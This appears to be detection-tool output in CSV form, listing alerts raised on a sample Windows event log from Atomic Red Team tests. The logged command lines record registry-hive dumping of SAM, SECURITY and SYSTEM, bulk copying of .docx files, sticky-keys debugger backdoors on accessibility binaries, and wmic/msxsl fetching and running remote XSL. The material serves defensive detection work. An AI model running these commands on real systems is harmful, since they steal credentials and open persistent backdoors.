2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\Security security.hive  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\System system.hive  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\SAM sam.hive  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe  /S /D /c"" dir c: /b /s .docx ""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr  /e .docx  :  Path: C:\Windows\System32\findstr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe  process /FORMAT:list  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe  process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
